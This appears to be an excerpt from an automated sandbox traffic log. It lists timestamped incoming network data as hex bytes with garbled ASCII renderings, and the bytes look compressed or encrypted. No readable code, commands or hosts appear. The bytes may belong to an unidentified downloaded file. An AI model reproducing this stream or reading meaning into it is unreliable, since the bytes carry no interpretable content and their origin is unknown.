                                                                                                                                                                                2021-11-11 11:26:04 UTC1539INData Raw: df 01 79 70 17 19 a2 4d b4 64 84 05 4a 4e af 00 0f 01 da 33 bd 90 00 56 ce 40 10 b9 cc a8 9a 13 4c 9b 71 e3 44 12 29 db e3 60 5b c4 3a 90 38 0b c3 7b 18 3e c0 63 a0 18 de b2 dc 00 f6 ca c2 af a2 56 3c 76 ed 32 86 18 23 f7 44 4f dd cf 08 2b 32 e9 94 19 cf e2 c8 ea fa 01 60 c4 85 2c 9e 19 52 d7 08 44 6c 04 0c 8c b8 5e 0d ac ed 42 94 03 d6 c0 05 b7 a0 63 a0 5a be 65 af 1c d4 a0 0a 8a 31 67 d6 0d b1 35 8c 54 66 7b 24 32 26 07 f4 dc e5 d6 a2 02 2c ca 96 92 73 fa 25 f8 ff e0 ab b5 0a e1 c5 90 71 96 2c 88 86 c0 38 80 35 c1 24 1e 13 46 ac 48 30 bc 42 da 10 18 e7 16 af 80 92 c0 ab e9 7c de c4 04 9b 00 47 df 60 6c 54 8c e5 dd 29 89 ed 28 04 c5 92 27 44 3a fc 02 22 29 97 27 fa 78 02 53 dd 85 b6 60 91 7b aa c7 08 95 fe 90 8b ef db 9c 4e 55 b3 fe 2c 34 61 13 0d fc 1c
                                                                                                                                                                                Data Ascii: ypMdJN3V@LqD)`[:8{>cV<v2#DO+2`,RDl^BcZe1g5Tf{$2&,s%q,85$FH0B|G`lT)('D:")'xS`{NU,4a
                                                                                                                                                                                2021-11-11 11:26:04 UTC1555INData Raw: 44 18 6c 20 f7 10 28 36 c1 24 b7 68 ae 79 24 da a6 c9 4c c0 58 e5 0e e2 52 7c 37 20 b8 17 0d a7 6a 7f 21 02 5b f4 47 aa e6 07 7f ae e6 c5 58 90 bc a2 40 8c 78 00 b5 5c 40 a0 50 2a 4d 5a cf 29 d4 c2 82 ea fe 20 bc e7 6d 39 26 17 5a 1a 89 07 97 f8 6c 06 46 47 5f 19 82 2e 18 75 83 98 1a 10 56 31 77 60 e8 d1 c1 8e 1e 23 ad 43 c4 6c ea 18 18 54 11 50 ba 49 00 9d cd 94 a0 b0 56 e2 2a cb a4 ee 77 8e e2 57 bf 39 48 8c 44 70 ab 5c 47 33 c0 44 dd 99 8a aa e9 3f c2 88 a0 e7 c8 04 5d 9e be 04 04 36 10 ac 62 48 69 4f 85 ac 6b b8 b4 0b eb 1d 14 d0 70 25 16 19 2f ac 8c 61 88 96 19 2c 1a 5f 20 26 de 0f ac 06 44 bf 05 fb 1d 81 43 2b ee e2 43 93 a6 75 c4 be 5f 28 f8 d7 26 fe cf 2e 11 2b d4 87 f1 73 08 5b 25 80 f9 60 0b 08 c5 00 b2 60 24 a0 01 d6 07 6d 31 59 46 d0 bc 64 9f
                                                                                                                                                                                Data Ascii: Dl (6$hy$LXR|7 j![GX@x\@P*MZ) m9&ZlFG_.uV1w`#ClTPIV*wW9HDp\G3D?]6bHiOkp%/a,_ &DC+Cu_(&.+s[%``$m1YFd
                                                                                                                                                                                2021-11-11 11:26:04 UTC1571INData Raw: 82 48 16 f3 57 90 d2 75 2c 11 d1 cc 2d 26 45 03 16 0c af cc 67 26 4e 35 aa 8a 8e 02 98 3a 34 14 7c dc 6d 00 4c f6 a1 17 04 3c 00 fe b0 ce e4 97 ad a4 a8 35 96 48 44 08 90 c5 8e f7 e4 b3 ef 9c 9a e5 5c a7 52 84 14 e7 02 bc 52 4d 5c 83 41 b2 d1 5b 11 51 cf 48 24 6f 2a d5 2e 08 00 19 50 4f e7 09 52 d9 23 95 dd a1 c3 4c e6 47 62 c8 00 eb 9d b6 5b 0c 54 7e 22 1a 66 78 e3 27 a3 b7 5a 93 00 57 d1 ba 0f 65 1d f2 c5 01 76 bd 40 9b 16 67 b5 2f 03 b9 13 63 77 1d aa e6 b8 46 60 6e ac 1a 10 7f 89 e8 04 d7 03 47 5f ad 89 b3 40 ac 28 57 4b dd e5 81 32 ce e0 4a dd fd 85 8b 03 01 7e 81 5b 16 34 2d 3d 4b 5a e3 d1 03 6c 28 4d 24 c9 ff 27 60 b1 fe 83 eb 44 30 a4 5e fc e9 76 13 56 50 fe cb 18 25 5e 7d ee 51 08 f2 0c 05 61 81 51 68 f7 4c 29 3b e9 72 9d 98 e5 56 08 15 e7 3e 00
                                                                                                                                                                                Data Ascii: HWu,-&Eg&N5:4|mL<5HD\RRM\A[QH$o*.POR#LGb[T~"fx'ZWev@g/cwF`nG_@(WK2J~[4-=KZl(M$'`D0^vVP%^}QaQhL);rV>
                                                                                                                                                                                2021-11-11 11:26:04 UTC1587INData Raw: ae 51 43 04 47 fc 12 08 20 58 b8 4e 88 a5 6a 00 eb f0 ca 86 d3 7f 70 55 2d 0a 5b 99 6e d5 7b 85 e6 eb a5 5a 2a 39 ac 8a 14 18 e2 96 70 13 ae 8c 27 33 92 7f 14 26 31 6e 7e 0c af 89 8a 1c 48 fc 98 0b 23 c2 10 68 e4 74 c6 24 3a 35 14 12 b5 21 5f 70 68 99 54 97 88 92 52 21 80 63 08 96 55 4a be f0 a6 09 85 0b a2 1c 5d 96 7d 38 5a 4d 4f ea 3d 80 3f e3 9b 13 6b f2 bd e8 87 1d bb 24 49 57 ef 8b 0d 75 27 51 56 4c 59 27 1c d2 60 01 ee 5d 9f 79 32 da fd 30 63 ea 5d 9d fd 3b 6e 9c 00 68 b6 93 20 13 d2 16 a7 58 2d e6 57 b5 58 2d fe 26 54 27 5b 52 3f a8 27 c8 a8 57 bf 01 e8 cd 5f 3b f7 d7 81 cc 13 32 27 a0 c4 de 5e 25 8b 8f 96 e3 95 57 3e ae 04 e9 35 f8 ed ff 8a 87 62 08 3e 50 d5 46 5a 5f 89 b1 2e 2b 25 65 fe 39 a0 8b 1c 71 2b 57 99 1c 80 7a c5 f7 28 99 4f 02 25 1c f4
                                                                                                                                                                                Data Ascii: QCG XNjpU-[n{Z*9p'3&1n~H#ht$:5!_phTR!cUJ]}8ZMO=?k$IWu'QVLY'`]y20c];nh X-WX-&T'[R?'W_;2'^%W>5b>PFZ_.+%e9q+Wz(O%
                                                                                                                                                                                2021-11-11 11:26:04 UTC1603INData Raw: c5 0e 01 12 63 e0 15 33 00 94 a1 67 01 cb 1e 40 62 5e c9 72 3a ad 90 82 f1 d7 5b 22 88 3d 01 bb 27 4e c1 43 0d e1 35 62 4c 0b 77 3d 93 f5 90 2c d8 b1 c5 4c 2b f9 ac 4e c4 0c 80 f2 60 00 9d f0 6f 54 04 6e 9a 00 e6 4b 5f 65 2a 0b 13 9e 95 18 84 be da 02 61 1e e0 e6 94 ad 00 c3 8e 55 2c c1 18 d3 15 6d b1 40 cd 0e 18 aa 62 8c 24 56 6f 87 a0 5e c3 d0 74 17 7c a4 b6 d1 f2 59 5c 81 a0 53 5a 83 e6 d9 d0 42 1a c4 20 6d d1 c1 bc 38 85 e2 74 a6 42 30 fc 80 af e5 a0 a2 d0 78 20 02 81 d1 fb 55 b7 28 90 a6 f8 3c 99 6c 3a cb a0 8c c9 bf 5b b4 1d d2 d1 5b 00 17 c7 84 40 2c 0b f5 13 aa 88 73 a8 1a 07 39 12 10 36 d5 fa ac 00 00 ac 84 be 83 59 f7 b3 e7 93 50 9c a3 6d b4 ab a8 18 a4 b8 aa 4e ad a4 8f 55 81 85 ee 74 0e 6f 9a ca 5e 31 2c 5c 83 2b a1 73 c4 68 0f 16 58 d3 6c ba
                                                                                                                                                                                Data Ascii: c3g@b^r:["='NC5bLw=,L+N`oTnK_e*aU,m@b$Vo^t|Y\SZB m8tB0x U(<l:[[@,s96YPmNUto^1,\+shXl
                                                                                                                                                                                2021-11-11 11:26:04 UTC1619INData Raw: 25 d1 c3 9f 50 03 93 5b 79 20 04 2b bb 2f 13 32 ee a6 14 25 5b df 94 39 fb 06 38 02 50 b8 3f 3a 46 49 f3 3c 87 68 af 80 b5 69 a2 c8 04 be 19 90 4b 22 5a 5f de c6 d2 7f 3c 3a 9d 75 9d 7d 6d 42 2a f3 43 db c2 93 f7 8b 5d e1 f2 56 85 0d 01 d1 5a ab e6 32 96 c8 5b ec 39 3b bf 00 51 b9 bb cc c7 3d 81 01 e9 aa dd fd 5d f7 d9 80 4a f9 2a 89 1b 31 ca 4a 59 be ca 31 0b e9 0e 22 00 74 30 b4 39 64 13 26 6f aa b0 69 d5 03 c4 ed 8c 13 6d 25 05 99 bb 52 24 8e bc 53 30 af 28 8c 21 e4 27 07 84 f0 47 31 73 e6 18 0b 65 f8 ca 1c 26 20 a9 61 e1 a7 16 4a 11 e2 02 01 bd e7 05 bf cd 28 2a 37 85 81 99 ba 2b 08 6b 08 98 32 70 02 8a c1 d9 2a 00 ec ce 9f 22 bd 8c 5c 47 5c 18 0c cf 26 9b 17 c9 3e 91 50 92 2f ed 7e 75 85 f1 6c f8 68 00 74 99 a7 43 94 fc 51 04 70 18 ff 4d ac e4 8e f5
                                                                                                                                                                                Data Ascii: %P[y +/2%[98P?:FI<hiK"Z_<:u}mB*C]VZ2[9;Q=]J*1JY1"t09d&oim%R$S0(!'G1se& aJ(*7+k2p*"\G\&>P/~ulhtCQpM
                                                                                                                                                                                2021-11-11 11:26:04 UTC1635INData Raw: d0 4c a8 e4 58 0f 1f a0 ec 42 55 45 f7 00 97 86 60 1e 40 02 8f d7 e8 ad 48 25 4c 89 8e 21 62 9b 96 e2 80 e9 98 6d ca 80 47 b0 27 1c 5d d2 1a 60 c0 a3 fe cf 25 db a0 e6 ec 53 02 af 89 80 ae cc 33 90 f8 54 b1 96 d8 96 22 c7 00 2b 64 e0 32 a7 ed e0 fc 6a ac 59 8a 81 2c 18 4f 59 d7 3c ea 31 38 19 24 44 70 de e8 4c 11 52 85 ad f7 b4 f0 0a 62 27 64 ce 6c 03 74 2b 27 08 fb 02 98 25 42 7c 32 88 34 01 00 2b 1f d1 1a 9f ba 02 2a 8d 18 45 c2 fc 06 ec 65 30 91 e2 a0 0e 2c 11 96 de c1 e7 d5 43 17 f9 ad 24 78 01 7e 34 e5 00 47 5f 76 00 b3 90 4d ce 74 22 e4 03 13 8b 4f c2 ac 80 ce 06 34 2e 01 e2 cc e8 7c e6 fa 69 e6 d2 f4 fe f1 92 d2 4e 7b 12 fc ba ce a2 64 0c 1b e8 5e 2c 50 5c 8a 26 cc 66 1f 62 77 34 96 b5 ed bf d0 5f 9d 4b 0e 30 08 c8 e1 f2 17 79 0a 0a c0 7a 7b ae 8c
                                                                                                                                                                                Data Ascii: LXBUE`@H%L!bmG']`%S3T"+d2jY,OY<18$DpLRb'dlt+'%B|24+*Ee0,C$x~4G_vMt"O4.|iN{d^,P\&fbw4_K0yz{
                                                                                                                                                                                2021-11-11 11:26:04 UTC1651INData Raw: 44 ff 40 1b af 38 06 50 f3 39 05 18 b8 48 ce 6a 09 88 52 5d e9 48 97 73 0f 18 04 51 d6 fa 6b 30 92 6e ee 9b 1a 2c 05 0e 70 0c b7 78 06 16 e2 9d 58 0c f0 5a 1a b8 4c fa 01 de a8 33 9f 29 22 55 41 ae 2c ca 6b cc a4 81 01 59 98 f9 8d 53 62 f5 93 1c 43 af e3 76 3a 40 da 40 3e 99 8a 2e ca b8 63 6c 44 eb 49 10 34 17 d2 1b f8 03 40 fb c1 00 18 c8 7f 52 5a b1 07 4f d8 fd 48 2f 3c 00 5e eb bc 43 70 9f a8 22 00 c0 bd 44 09 c1 8e 37 a5 27 81 83 de 4c 45 f4 fa 81 bf 95 bc a0 17 96 34 c5 1e 16 85 de a4 b4 ba 29 ea 27 a6 80 71 53 b0 c6 5e 02 a0 12 15 f0 5c 5b c7 d8 96 9b 70 16 48 df 50 f0 9e 7b 3f f0 e1 a5 af dd ca 10 75 48 92 6a 51 c0 4c 97 5a 5f 05 18 e8 bc 0e e3 3a 7f 34 40 eb a3 49 87 77 2f 44 93 e0 a6 2a c5 00 91 ed 32 5d a4 10 ef 63 b5 d2 2e 1c 54 b3 36 91 01 00
                                                                                                                                                                                Data Ascii: D@8P9HjR]HsQk0n,pxXZL3)"UA,kYSbCv:@@>.clDI4@RZOH/<^Cp"D7'LE4)'qS^\[pHP{?uHjQLZ_:4@Iw/D*2]c.T6
                                                                                                                                                                                2021-11-11 11:26:04 UTC1667INData Raw: 99 96 3e d1 e8 c5 6a 8c 08 48 5c 48 2c 13 6d be 14 8c 7a ac 42 29 2f 1e 30 be 22 92 44 5b 16 62 11 18 1f 6f 44 56 2d d2 e4 18 c6 d3 03 c6 88 f5 02 54 78 be bd da 4c 20 67 3e 31 ec b6 7c 44 c4 d4 41 f6 09 94 df b0 3b 7d c2 aa df 45 64 37 6c f2 0c 4a d7 cc be 09 e1 8a fd ff 7d 7b 31 1a 6a 16 5f fc 3a 25 f1 36 4f 91 ce 61 60 4f af 3c 70 b2 14 06 03 44 a2 84 53 86 c8 1a 9a ba 54 4b 4a ef 30 c8 3d a1 c0 4b 1c c0 46 17 76 c5 b1 1e 00 46 64 ee 61 53 03 26 ed dc c7 0a a1 5f a2 42 bf a4 04 48 f8 98 14 e3 8a 56 26 fc b2 97 14 72 c0 48 7e 2c 4f c2 53 5c 74 90 e8 4c 17 44 4e 16 13 34 28 53 91 60 67 61 97 5c ab ae 01 70 79 df 13 5d 8c 58 0b 5e 94 f2 62 87 08 9a 7d 81 3a 07 af 4a 7f e6 51 04 42 53 7a 9c 21 97 d3 42 3c 6a 98 58 68 52 a0 0e c9 3b c5 7c dc ab 21 f2 fe e6
                                                                                                                                                                                Data Ascii: >jH\H,mzB)/0"D[boDV-TxL g>1|DA;}Ed7lJ}{1j_:%6Oa`O<pDSTKJ0=KFvFdaS&_BHV&rH~,OS\tLDN4(S`ga\py]X^b}:JQBSz!B<jXhR;|!
                                                                                                                                                                                2021-11-11 11:26:04 UTC1683INData Raw: 77 ea c7 09 47 d9 50 40 55 e5 ba 20 88 31 20 2c 40 cb 5a 6b b2 82 d9 70 92 6a 17 45 ab 98 b4 97 e0 43 88 a1 0c 9d 5d b3 e2 92 f6 77 e2 f2 5f 56 54 ec 34 54 5b 4d 30 e7 5d 84 fe d3 31 c4 53 b9 71 89 76 22 20 9a eb c3 da 3d 3d a8 82 ac da 26 2a 1d 83 5c 20 bb 09 2c 96 03 82 f0 31 0f e3 b6 b0 17 00 1a 84 23 21 95 0e 51 f1 1d 15 a0 8f d0 a8 80 73 00 50 34 94 1a fd b3 a5 07 12 2c 86 20 bf 21 1c 79 db 6b dc 4e 64 60 8d 20 08 39 14 71 2d 6b 07 83 e8 02 7a 05 1b ca 86 58 03 80 3e cc e3 f7 12 f3 46 4c af 70 76 4d 30 01 88 b0 75 c5 0c d2 dd 06 82 db eb 24 12 1f e9 43 be 8c 66 a0 70 24 c2 15 bb c1 2a 48 2e 8c 1b c1 44 03 5c 20 2d 8e 2c d9 f2 01 93 1a 9a 12 64 54 f7 01 7e 54 46 b9 30 13 ab 3e b8 2c 8f dc d0 a1 65 48 e0 64 91 00 8f 0e 42 12 bb e9 bd a5 04 95 76 02 19
                                                                                                                                                                                Data Ascii: wGP@U 1 ,@ZkpjEC]w_VT4T[M0]1Sqv" ==&*\ ,1#!QsP4, !ykNd` 9q-kzX>FLpvM0u$Cfp$*H.D\ -,dT~TF0>,eHdBv
                                                                                                                                                                                2021-11-11 11:26:04 UTC1699INData Raw: e5 80 52 58 ef cb d8 d7 fa da 95 4a ef 2d ba 2d cd 8b 51 5f 4d a0 ab 27 40 52 68 1b ae 5f a2 eb 2c 76 5a 95 74 cc fa 92 2d 55 db c0 c8 26 f8 e9 98 48 a1 31 4a 91 06 2a f7 28 e2 20 45 02 f4 41 4f 27 32 05 44 3f 21 ca 9b 1d d1 98 29 3d 54 a3 26 78 d2 b8 00 24 23 48 94 cf 67 e6 ef 90 2d 32 42 56 38 b5 80 e2 68 47 72 34 09 78 8c 9d 60 91 dd a7 6a 82 85 55 5f 40 f9 a9 13 00 c5 a4 b3 4d 79 a3 15 9b 5a 26 dd ee 3e e3 42 4e d0 d8 f7 c3 e2 4b 49 44 6c 0b 43 24 ee 31 b4 ea 4f c3 84 bb f9 59 a4 b4 e2 3e 5a 3d cb 62 74 42 cc 65 20 f2 c4 4a fb 29 ee 6b ec 36 c2 c2 34 09 fd 69 8d 56 2b b8 4b c4 ee 5d ba f2 36 1d 52 ba 04 9e a9 51 af e3 ba d7 fc 82 c2 6c c5 31 77 45 96 a8 44 ac 14 fa fc 07 fd bd 73 29 d3 85 eb 1f 08 e7 d7 e6 5c 04 68 88 0b 34 2a ee 8c 88 49 13 74 c0 2c
                                                                                                                                                                                Data Ascii: RXJ--Q_M'@Rh_,vZt-U&H1J*( EAO'2D?!)=T&x$#Hg-2BV8hGr4x`jU_@MyZ&>BNKIDlC$1OY>Z=btBe J)k64iV+K]6RQl1wEDs)\h4*It,
                                                                                                                                                                                2021-11-11 11:26:04 UTC1715INData Raw: 69 04 eb 1b 63 b1 88 f1 4a 12 0c 8f e4 00 99 6f 4e 9b b2 62 05 72 9e 14 83 0b a4 1b 71 46 4d 00 1a 4a 1c fb cf 43 46 4b 5f af 88 d7 33 67 18 90 c7 c0 0c d2 6b 0e 99 6f 02 a3 02 c2 8d fa 4d 31 0c 44 0c c6 30 80 94 55 70 66 a6 1b 27 1d 09 20 79 d6 1d a4 41 65 49 50 31 5b f0 87 e1 00 82 74 84 22 1f 9f 60 48 4d 45 b1 61 2e 27 d0 2c 8c 8a 01 06 ca 26 a0 fe dd d2 61 17 22 11 0b 56 8c 4a 1e ce 22 40 1f ef c2 21 49 b5 8b 98 2b eb 9c c1 20 86 b2 b6 14 80 34 84 4d 0f a1 d1 8b 28 50 1a 16 31 01 21 a7 06 39 78 a3 00 64 84 76 4d ea bd d7 00 3d 14 8b 8e 41 5d e9 07 05 26 2b 9a 93 da ec a9 c5 b6 b8 85 aa e9 a9 25 c6 60 5b ab 19 99 75 25 de ed 89 5f 3a 59 9f 89 22 ad 90 75 2b 8d 09 99 7a 85 bc 71 09 8a eb 41 ea 40 d3 d1 b3 54 96 c9 9f 8a b0 74 1d b5 ef 60 23 f0 3a a2 2b
                                                                                                                                                                                Data Ascii: icJoNbrqFMJCFK_3gkoM1D0Upf' yAeIP1[t"`HMEa.',&a"VJ"@!I+ 4M(P1!9xdvM=A]&+%`[u%_:Y"u+zqA@Tt`#:+
                                                                                                                                                                                2021-11-11 11:26:04 UTC1727INData Raw: 27 48 8c 57 71 cb 4c cf 70 57 3c b8 56 5a fb 70 3f f8 32 27 86 38 5f 1a 4e eb dd 63 e2 5d 6c cb ed c2 10 0a 3a 9d 7b a1 99 47 49 43 2b 98 97 9a ea e7 0b e9 33 85 dc 60 45 98 d4 26 f3 b0 90 05 b6 55 43 be 20 43 a2 a3 31 0d ee 79 a4 e0 31 00 c0 98 02 45 04 fb bc 5d 3b 85 ba e2 b5 0a 1a 3a 35 08 82 f0 60 02 fd 57 90 dc db a0 80 53 11 b4 e2 43 09 25 05 60 13 d7 b4 0b 06 a8 c3 05 2a 30 c9 24 d8 a7 28 52 24 29 a9 3a 8c 43 13 20 80 b7 82 97 2a d3 d4 02 65 08 ef 1e ad af 7d 96 a1 97 98 14 4f f2 9d 7e 8f 50 88 33 84 c1 04 07 fd fc ff 4a d2 09 9f 53 10 f9 52 1e fe 21 0f db 08 12 32 1a 4e 18 63 07 c9 44 68 d8 22 30 59 90 b4 a9 20 ea 14 c9 f7 1f 2a 08 ac 88 4e 88 e3 1c 03 09 47 77 5f d6 19 45 cb 2a c4 43 be bd 9d 80 9f 01 f7 86 47 49 2b 64 04 c2 fd 5c 4c 87 00 05 95
                                                                                                                                                                                Data Ascii: 'HWqLpW<VZp?2'8_Nc]l:{GIC+3`E&UC C1y1E];:5`WSC%`*0$(R$):C *e}O~P3JSR!2NcDh"0Y *NGw_E*CGI+d\L
                                                                                                                                                                                2021-11-11 11:26:04 UTC1743INData Raw: 8c 70 9b 51 24 88 6f a5 70 60 a9 e0 eb 5e 6b 36 99 5a 86 78 4b ec fe d2 82 ef 58 36 0c ce c2 b6 0b 48 c4 e3 8c 20 13 31 48 74 0b dc e6 14 c2 61 6f 64 7a 05 a8 9f 07 00 ac 39 eb ad 0d 2b e7 6b e2 3b 3c 03 95 cc 96 09 00 b7 f8 7f 77 17 ee b0 9a 29 27 bc 9f af 51 d7 f0 12 c1 63 96 80 81 53 18 18 85 39 08 6c 6f cf 80 1e 76 01 49 d1 bd a4 c6 98 2c bf 3a 55 df cf 70 08 c0 97 13 2a 2c 03 25 a0 1d 20 e2 c4 a9 22 38 33 fe dd bc 5f 5b e2 aa 31 ca 33 bc cc 2a 87 19 74 ae 42 52 93 6a 05 58 da b8 0f 9c c9 24 d9 43 88 5a 45 5f 05 a8 f4 d8 8e a1 ef 9d 98 77 5b a9 bf 23 ae b9 87 05 80 35 ea 74 6d ed b0 02 79 f2 f8 ff 97 29 d5 9a 77 5f 98 20 32 6f 1d 99 1c 0f 02 83 e5 04 11 a6 a8 51 60 5e db 01 bf 3a 89 5f 22 8d 1c f5 90 58 cd 21 80 7c 17 68 84 b4 0e 91 09 07 9a c7 9c 72
                                                                                                                                                                                Data Ascii: pQ$op`^k6ZxKX6H 1Htaodz9+k;<w)'QcS9lovI,:Up*,% "83_[13*tBRjX$CZE_w[#5tmy)w_ 2oQ`^:_"X!|hr
                                                                                                                                                                                2021-11-11 11:26:04 UTC1759INData Raw: 31 21 08 87 63 45 a7 1a 97 68 07 e1 e0 06 d6 1d ea d7 71 19 09 2f 99 58 fd 02 28 b5 9a 84 e2 b6 f0 8d 8c 0e 79 c7 1f 2c b9 70 98 6b 00 27 e3 05 f3 b9 62 24 a0 a5 3c e1 a9 56 43 13 26 ec 04 a6 a7 bf f9 05 82 88 9a 4a 66 32 15 82 ec fc 80 01 0f 68 38 1c b1 30 22 8e 17 f1 ed ec 23 c3 28 5c b8 ff a5 5f 20 40 68 2d 4e 88 45 11 c4 40 ef e2 bd 87 10 8f a1 03 e1 f4 56 f1 1e 8a 0f d7 ce d5 26 f8 c0 77 42 34 dd 75 50 39 b5 54 f0 00 48 5c 6e 2a 3b 1d 27 55 94 71 8c a7 d5 e4 ca 2d 68 3d 23 58 c4 e5 18 50 30 bf 1c 32 17 cb 18 18 d8 94 03 69 0f 56 d7 31 f8 10 18 3c cb 00 2d b8 4c f7 2f f2 14 2d 1a a8 fe 7c 45 95 fc 2e 31 16 55 e9 02 48 87 f7 63 cd 1c 69 8f 2f d4 7f c0 aa 46 b2 c7 2c c5 97 62 cd 57 76 38 16 36 c0 a0 7b c7 2d e5 e0 25 9b 3c 30 44 4f ab d8 f6 41 22 13 27
                                                                                                                                                                                Data Ascii: 1!cEhq/X(y,pk'b$<VC&Jf2h80"#(\_ @h-NE@V&wB4uP9TH\n*;'Uq-h=#XP02iV1<-L/-|E.1UHci/F,bWv86{-%<0DOA"'
                                                                                                                                                                                2021-11-11 11:26:04 UTC1775INData Raw: aa e6 58 22 27 c6 77 e6 3c 03 11 4e 79 12 7d 16 25 4e 7a 02 22 f1 d4 d8 e0 17 dc 4c 8c 92 68 85 68 19 fb e6 48 26 39 2e a4 69 87 bb 2a 5d d9 98 18 cc 17 99 90 00 72 a7 6a 40 5f 38 91 dc 49 68 d4 ce d2 95 fc aa 43 5a e0 c7 94 43 58 84 be 78 95 6e 92 00 8d 8c 08 c1 6a 54 74 68 00 fc f1 d0 0b 3f 60 66 1d c1 30 47 ec 8f 53 e7 ad c8 dc 2c 16 7c f7 ee 4c 56 03 ac 89 9d 80 0a 87 72 d4 58 60 01 a9 15 96 3b fc 31 5d 64 3c 32 54 80 1c 3f 90 bb 95 0a 78 1e 26 8e a7 c8 17 59 0c 66 62 4c f7 4b 12 80 38 fd 1d 81 7b d3 9d f9 2e 6a 08 42 ca dd 7f b8 dc 8d 51 29 b8 d0 90 16 d1 b8 3a 90 fa 80 40 01 be 1e 02 99 d6 89 96 b3 48 70 f2 1f 09 ef b5 95 b1 59 98 6d ac fa 78 96 36 20 31 e1 fc 5f ec b8 46 c1 e7 14 46 5a c8 c6 a9 00 fe 53 83 b0 8a 2c 3a a6 25 4d 52 fd ac 74 f8 ce ba
                                                                                                                                                                                Data Ascii: X"'w<Ny}%Nz"LhhH&9.i*]rj@_8IhCZCXxnjTth?`f0GS,|LVrX`;1]d<2T?x&YfbLK8{.jBQ):@HpYmx6 1_FFZS,:%MRt
                                                                                                                                                                                2021-11-11 11:26:04 UTC1791INData Raw: cf 24 b2 10 a0 47 28 c9 12 ae 5c 42 8c 8d e9 ac 94 69 9f a4 8b 32 12 fa e6 be 5c bd f0 d7 34 d6 fb a9 5f e5 d0 1d cd 7f f2 4b 05 b9 be 09 68 8d ec d5 3a d3 77 f1 39 48 06 02 29 e8 5d 87 ec fb e7 01 51 54 2a af 29 d8 3e a6 cf 8e 34 93 bb f2 c7 b4 be fd d2 f4 fa 8f 84 d0 15 02 68 af e3 8d 02 5d f1 93 5a 77 94 dd 9f 56 97 56 17 e9 08 97 05 ce e3 6f b0 9f 9e 25 d6 74 44 4c 04 6c f3 94 9a 97 00 5b d5 f2 cf 9f 92 34 06 42 e8 f5 c5 26 21 4a 8f e0 50 52 1f dc ec cf 12 d0 00 0e 04 8e c8 53 1c 04 be 5b 59 e0 93 d8 fc 46 22 18 97 31 30 64 8c 48 2a 2f 44 46 55 a0 13 b8 f8 2c 60 ce 81 de f9 d4 ac 35 9f 24 18 37 50 f0 3e 76 89 20 0b 98 47 d7 23 78 92 5b 10 c1 06 dd 02 87 6c 31 17 41 34 3f 8c d4 2a 58 9e 0d 18 7e cf 2c 80 32 c6 c0 c9 05 24 4e 1a c2 7a ff 55 da ca 20 fb
                                                                                                                                                                                Data Ascii: $G(\Bi2\4_Kh:w9H)]QT*)>4h]ZwVVo%tDLl[4B&!JPRS[YF"10dH*/DFU,`5$7P>v G#x[l1A4?*X~,2$NzU
                                                                                                                                                                                2021-11-11 11:26:04 UTC1807INData Raw: 64 11 5a 6c e6 d0 7b 0f 6d c5 05 dc 00 cd 0e 99 83 fa 24 32 e4 8d 82 e5 c1 ef d5 c0 14 2d 76 c6 60 78 42 58 00 8f fb da e7 c6 37 88 b3 03 17 3e 72 87 f8 46 00 f4 af b6 07 7b 16 60 f4 67 57 50 54 a1 b5 e6 51 47 ad df f8 2a 9c 5e 16 3e 27 58 e0 39 03 31 3a 50 22 5d 2e 00 1d 1b df 10 b2 94 bb 5d 29 05 e5 19 34 4f bf 30 f1 d8 9e a9 49 0a 31 2f 56 d5 94 78 50 53 0f 68 12 48 15 34 ab f6 ba ce 68 02 2c 48 73 d8 86 9f 1c 32 bf c5 07 ad f3 9c 39 81 6c e7 6f 46 c1 ee 20 ff e6 3b 02 81 04 aa f1 d7 7d 80 e8 e2 17 09 17 9e 01 f5 65 db bf 12 4e ba b6 fb 97 a9 e2 3f 52 fe 9d f7 9e 82 97 fc 80 79 8b e2 5f 67 8a 00 bf 1a fa af 4e f7 48 df 0c 01 06 4f 53 bb 2a 39 f0 3f 81 00 f3 38 79 6a 3d 29 df 5b 17 01 fd 5f fa 8a 3b 92 bb 7d 1d 6e ac 47 a4 aa f8 ee b4 9d ae 3f e6 be 03
                                                                                                                                                                                Data Ascii: dZl{m$2-v`xBX7>rF{`gWPTQG*^>'X91:P"].])4O0I1/VxPShH4h,Hs29loF ;}eN?Ry_gNHOS*9?8yj=)[_;}nG?
                                                                                                                                                                                2021-11-11 11:26:04 UTC1823INData Raw: f1 1e 08 c6 d5 3d 43 8a 0a 57 e6 17 b9 bc fb 84 09 e5 04 a8 1f bf a6 8a 40 1c f3 bb 00 84 b5 93 4a 43 e0 52 6c 85 04 1e 02 94 ef 71 84 b5 97 22 f4 18 d0 a6 1c de 81 c4 8c ac 1f be dd b6 2f b7 06 62 08 75 23 de 06 62 cc d3 5d 29 88 29 18 16 28 70 1e 94 b0 5e 0b 65 c0 ca f9 51 cb 8c be 02 90 eb 5b 0f f8 de c1 1f e9 80 7f 48 f4 2c 01 a6 f2 ca 49 7d 18 97 8c 6c d0 41 1c e8 e2 90 18 4a 75 26 4c e6 12 43 01 17 9c 21 96 3a 14 01 96 02 2e d7 6b 5f 89 64 93 ee 59 30 a0 00 ec 94 98 7c a0 01 e9 01 88 ad 17 5f 7b 21 fa dd 29 2c 84 12 40 d1 14 d6 5c 62 6c 37 6e d5 d1 d0 a4 32 87 e6 84 cf 2c b8 7f 50 ad 84 48 b5 80 8c 6b de 0b 99 00 c7 bf 82 6c c3 c8 cb 6d fe 16 12 e7 a7 40 ae 20 4c 29 19 c4 70 f2 a8 b0 a4 9a 32 5e db d0 8f 50 f4 28 26 13 b6 02 e0 0e ce 79 55 8c 44 10
                                                                                                                                                                                Data Ascii: =CW@JCRlq"/bu#b]))(p^eQ[H,I}lAJu&LC!:.k_dY0|_{!),@\bl7n2,PHklm@ L)p2^P(&yUD
                                                                                                                                                                                2021-11-11 11:26:04 UTC1839INData Raw: 33 d6 e1 28 1a 73 65 97 7c 55 91 c4 44 45 8c 5c b2 7c 20 77 03 66 09 1b 75 27 02 1c 35 ef 53 a7 7c ee 00 f8 9e c2 c4 06 eb 0a b6 38 78 8e d0 41 32 92 4e b9 8d 4b 20 56 e9 bb d2 31 03 76 2d 52 12 c2 a3 aa 99 64 00 c0 9e b5 36 70 ed 0b 04 60 e1 b8 ac e3 41 3c 18 8c b3 fb 65 0d 5f 44 97 2e 96 02 0b 01 d0 90 3c 36 e3 95 cc 5d 4b 2e 4b 88 1e f8 84 06 c8 50 47 28 fc 55 11 71 52 4a 5b b4 98 86 9d 00 04 75 03 15 7f 01 d2 53 39 31 bd 1e 95 cc 6c cf c3 a4 ed 26 57 e0 5b 76 0b 00 d2 52 6e 42 9c d4 eb 7e 01 f7 9a f4 15 d1 08 d9 33 28 10 66 d2 16 3b c4 31 1b 6f 9c 89 16 d0 93 